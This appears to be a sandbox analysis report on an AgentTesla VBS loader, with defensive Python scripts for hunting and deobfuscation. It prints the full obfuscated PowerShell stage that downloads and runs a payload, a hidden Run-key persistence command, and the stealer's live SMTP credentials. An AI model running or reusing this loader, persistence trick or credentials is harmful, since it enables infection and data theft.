Analysis

max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-06-2024 09:18
Static task: static1
Behavioral task: behavioral1 (sample overdue_invoice.vbs, resource win7-20240221-en)
Behavioral task: behavioral2 (sample overdue_invoice.vbs, resource win10v2004-20240426-en)
The results on this page are from behavioral2, the Windows 10 2004 x64 image named under platform above.
General

Target: overdue_invoice.vbs
Size: 15KB
MD5: 7078829e255df55f25a8bcaa9bdaffb4
SHA1: 1bcacd12305661a2dedecb4eb6f8ad57ae5d672e
SHA256: d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c
SHA512: 4d56cc648febb1c0dceb44e41415cb30a9e975997f5d3fa67b97e2a039d6068f383e285daeb39b50eb0b18bd1a1c5c102544f2670e54e3109cff74d6268e1495
SSDEEP: 192:ulJUFFdUTxfDs+rHw7FEFggnliEWHxg40HG5Q6MkouP0L3gwJSi3qMFP6WPS6vMy:ulCHkxNrHwhEjiIvkJ8LJRY4Er8saQa
Malware Config

Extracted: agenttesla
Protocol: smtp
Host: mail.defenber.com
Port: 587
Username: [email protected]
Password: X8hhdzc})RSz
Email To: [email protected]

Port 587 is the SMTP submission port: the payload authenticates to the operator's mailbox with the credentials above and mails the stolen data to the "Email To" address. The host and the account are the actionable network indicators; both mailbox addresses are rendered as "[email protected]" on this page and cannot be recovered from it.
Signatures

AgentTesla
Agent Tesla is a .NET-based remote access trojan and information stealer (keylogging, clipboard capture, credential theft from browsers and mail clients), sold as a commodity tool and commonly built in VB.NET or C#. This sample reports over SMTP using the mailbox in the extracted config above.

Blocklisted process makes network request (1 IoC)
Processes: powershell.exe (PID 4456), network flow 15

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely as a geofence; this is done by the VBS stage (WScript.exe) before anything else runs.
Processes: WScript.exe queried the key value \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation
Adds Run key to start application (2 TTPs, 1 IoC)
Processes: reg.exe set the value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)"
The value is written as REG_EXPAND_SZ (see the reg.exe command line in the process tree), so %Rundsavsbladene% is expanded at logon. The variable's content is not shown in this report; given the arguments (-w 1 for a hidden window, then a script passed positionally) it presumably names a PowerShell executable. The persisted stage is not a file on disk: the command reads the registry value Typeregningens under HKCU\Codebtors into $sartor and hands it to the interpreter, so a file-based autorun review would miss it.
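A hunting check for the persistence pattern above, as an added example that is not part of the sandbox report. It flags HKCU Run values that combine a launcher hidden behind a non-Windows environment variable, a hidden window, a script body pulled from another registry value, and an interpreter executing a variable, which is the shape of the tonsillectomic entry. The first sample entry is the value this analysis recorded; the list of well-known variables and the two benign entries are assumptions added for contrast.

```python
import re
import sys

# Variables Windows defines for every session (assumed list). A Run value
# whose launcher is any other %NAME% depends on a variable something else
# planted in the user's environment, as this sample does with %Rundsavsbladene%.
WELL_KNOWN_VARS = {
    "systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
    "programdata", "appdata", "localappdata", "userprofile", "public", "temp", "tmp",
    "commonprogramfiles", "commonprogramfiles(x86)",
}

# Leading %NAME% (optionally quoted) is the launcher of the Run value.
LAUNCHER_VAR = re.compile(r'^\s*"?%([^%]+)%')
CHECKS = [
    ("hidden window requested",
     re.compile(r"(?<!\S)-w(?:indowstyle)?\s+(?:1|h(?:idden)?)(?!\S)", re.I)),
    ("script body read from another registry value",
     re.compile(r"Get-ItemProperty[^;|]*HK(?:CU|LM):|\breg(?:\.exe)?\s+query\b", re.I)),
    ("interpreter executes a variable's contents",
     re.compile(r"\biex\b|invoke-expression|\(\s*\$\w+\s*\)\s*\"?\s*$", re.I)),
]


def run_value_findings(value: str) -> list:
    """Reasons a single Run value resembles this sample's persistence."""
    reasons = []
    m = LAUNCHER_VAR.match(value)
    if m and m.group(1).lower() not in WELL_KNOWN_VARS:
        reasons.append("launcher is a non-standard environment variable")
    for reason, pattern in CHECKS:
        if pattern.search(value):
            reasons.append(reason)
    return reasons


def suspicious_run_values(entries) -> dict:
    """Map value name -> reasons, for (name, value) pairs with a finding."""
    result = {}
    for name, value in entries:
        reasons = run_value_findings(value)
        if reasons:
            result[name] = reasons
    return result


def read_hkcu_run() -> list:
    """Live HKCU Run values on Windows; an empty list on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only standard-library module
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, value, _type = winreg.EnumValue(key, index)
            except OSError:  # raised when no more values remain
                break
            entries.append((name, str(value)))
            index += 1
    return entries


SAMPLE_ENTRIES = [
    # The value reg.exe (PID 1804) wrote in this analysis.
    ("tonsillectomic",
     "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)"),
    # Constructed benign entries (assumed, for contrast).
    ("SecurityHealth", "%SystemRoot%\\system32\\SecurityHealthSystray.exe"),
    ("ExampleTray", "\"C:\\Program Files\\Example\\tray.exe\" --minimized"),
]

if __name__ == "__main__":
    # On Windows this scans the real key; elsewhere it falls back to the sample.
    for name, reasons in suspicious_run_values(read_hkcu_run() or SAMPLE_ENTRIES).items():
        print(name, "->", "; ".join(reasons))
```

Run on the sample entries, only tonsillectomic is reported, with all four reasons; the two constructed benign values produce none. The check is deliberately keyed on the combination rather than on the value name, since the name and the variable are random dictionary words that change per build.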
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP, which AgentTesla includes in its reports.
Processes: flows 36 and 37 to api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
Processes: wab.exe (PID 5016)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: powershell.exe (PID 4980), wab.exe (PID 5016)

Suspicious use of SetThreadContext (1 IoC)
Processes: powershell.exe (PID 4980) set the thread context of wab.exe (PID 5016). Together with the WriteProcessMemory and MapViewOfSection events below and the fact that wab.exe was started with no arguments, this is consistent with process hollowing: the 32-bit PowerShell stage injects the AgentTesla payload into the Windows Mail contacts binary and redirects its thread to it.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes: powershell.exe (PID 4456, 2 events), powershell.exe (PID 4980, 3 events), wab.exe (PID 5016, 2 events)

Suspicious behavior: MapViewOfSection (1 IoC)
Processes: powershell.exe (PID 4980)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: SeDebugPrivilege enabled by powershell.exe (PID 4456), powershell.exe (PID 4980) and wab.exe (PID 5016)

Suspicious use of SetWindowsHookEx (1 IoC)
Processes: wab.exe (PID 5016); a Windows hook installed from the injected process is consistent with AgentTesla's hook-based keylogger.

Suspicious use of WriteProcessMemory (21 IoCs)
Processes (parent wrote to child; number of events in parentheses):
  WScript.exe (PID 4168) -> powershell.exe (PID 4456) (2)
  powershell.exe (PID 4456) -> cmd.exe (PID 2628) (2)
  powershell.exe (PID 4456) -> powershell.exe (PID 4980) (3)
  powershell.exe (PID 4980) -> cmd.exe (PID 2068) (3)
  powershell.exe (PID 4980) -> wab.exe (PID 5016) (5)
  wab.exe (PID 5016) -> cmd.exe (PID 764) (3)
  cmd.exe (PID 764) -> reg.exe (PID 1804) (3)
Processes
(The sandbox's depth markers 1 to 6 are kept as [n]; each process is listed with its image, its command line as captured and the signatures attributed to it.)

[1] PID 4168  C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

[2] PID 4456  64-bit PowerShell launched by the VBS (child of 4168); image and the full obfuscated command line as captured:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

[3] PID 2628  C:\Windows\system32\cmd.exe (child of 4456)
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
(This string is the decoded $Springdanses literal of the script above; the loader uses cmd.exe to resolve the expanded path %appdata%\Skrmet.Kli, presumably its staging file.)
[3] PID 4980  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (child of 4456)
Command line: identical to that of PID 4456, i.e. the same obfuscated script re-executed under the 32-bit (SysWOW64) PowerShell.
Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

[4] PID 2068  C:\Windows\SysWOW64\cmd.exe (child of 4980)
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
(Same path probe as PID 2628, repeated by the 32-bit run of the script.)

[4] PID 5016  C:\Program Files (x86)\windows mail\wab.exe (child of 4980)
Command line: "C:\Program Files (x86)\windows mail\wab.exe"
Started with no arguments and then written to and SetThreadContext'ed by PID 4980: this 32-bit Microsoft binary is the host process for the injected AgentTesla payload, which is why the keylogger hook and the SMTP exfiltration originate from wab.exe rather than from PowerShell.
Signatures: Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

[5] PID 764  C:\Windows\SysWOW64\cmd.exe (child of 5016)
Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
Signatures: Suspicious use of WriteProcessMemory

[6] PID 1804  C:\Windows\SysWOW64\reg.exe (child of 764)
Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
Signatures: Adds Run key to start application; Modifies registry key
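The command lines of PIDs 4456 and 4980 above are built from one routine: Acarpelous keeps every sixth character of each literal (starting at index 5 and never reaching the final character) and Sulfide dot-sources the decoded text through iex. The following Python decoder is an added example, not part of the sandbox report; it re-implements that routine, extracts the literals from a captured command line and rewrites the script in readable form. The four short literals in the sample input are copied from the captured command line of PID 4456; the Sulfide call in the sample and the round-trip encoder are constructed.

```python
import re


def acarpelous_decode(blob: str) -> str:
    """Python mirror of the sample's Acarpelous function.

    The PowerShell original sets $Oisen = Length - 1 and loops
    For($i = 5; $i -lt $Oisen; $i += 6) { Substring($i, 1) }:
    one plaintext character after every five characters of filler,
    with the last character of the blob never reached.
    """
    limit = len(blob) - 1
    return "".join(blob[i] for i in range(5, limit, 6))


def acarpelous_encode(plain: str, filler: str = "abcde") -> str:
    """Inverse of the routine, used here only to construct test input.

    Any five filler characters work; the sample pads with fragments of
    Danish dictionary words. The six-character tail keeps the last real
    character below Length - 1, matching the trailing ' ' in the sample.
    """
    assert len(filler) == 5
    return "".join(filler + ch for ch in plain) + filler + " "


# A PowerShell single-quoted literal: no escapes except '' for a quote.
LITERAL = re.compile(r"Acarpelous\s+'((?:[^']|'')*)'")
# Sulfide(Acarpelous '...') is the sample's "decode, then dot-source via iex".
SULFIDE = re.compile(r"Sulfide\s*\(\s*Acarpelous\s+'((?:[^']|'')*)'\s*\)")


def _unescape(literal: str) -> str:
    return literal.replace("''", "'")


def decode_command_line(cmdline: str) -> list:
    """Every decoded literal, in the order it appears in the command line."""
    return [acarpelous_decode(_unescape(m.group(1))) for m in LITERAL.finditer(cmdline)]


def deobfuscate(cmdline: str) -> str:
    """Rewrite the loader readably: each eval wrapper becomes the statement it
    executes, and each remaining literal becomes a plain single-quoted string."""
    text = SULFIDE.sub(lambda m: acarpelous_decode(_unescape(m.group(1))), cmdline)
    return LITERAL.sub(lambda m: "'" + acarpelous_decode(_unescape(m.group(1))) + "'", text)


# Sample input: four literals copied from the captured command line of
# PID 4456, plus one constructed Sulfide call produced by the encoder above.
SAMPLE = (
    "$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';"
    "$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';"
    "$Romanbladsstil199=Acarpelous 'Non.n>Reall ';"
    "$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';"
    "Sulfide (Acarpelous '" + acarpelous_encode("$x = 1") + "');"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Applied to the page's literals this yields 'User-Agent', 'iex', '>' and the probe string echo %appdata%\Skrmet.Kli && echo t, which appears verbatim as the command line of PID 2628; that match is the check that the decoder is faithful. Feed it the raw command line from the sandbox export rather than the text as printed here: the page rendering collapses repeated spaces inside the longer literals (the Mozilla/5.0 User-Agent string, for one), which shifts the six-character stride and drops characters from that point on.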
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File 2
Filesize: 480KB
MD5: 9916e5a5f7afe8c1f861f93999a875f3
SHA1: 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
SHA256: 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
SHA512: 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc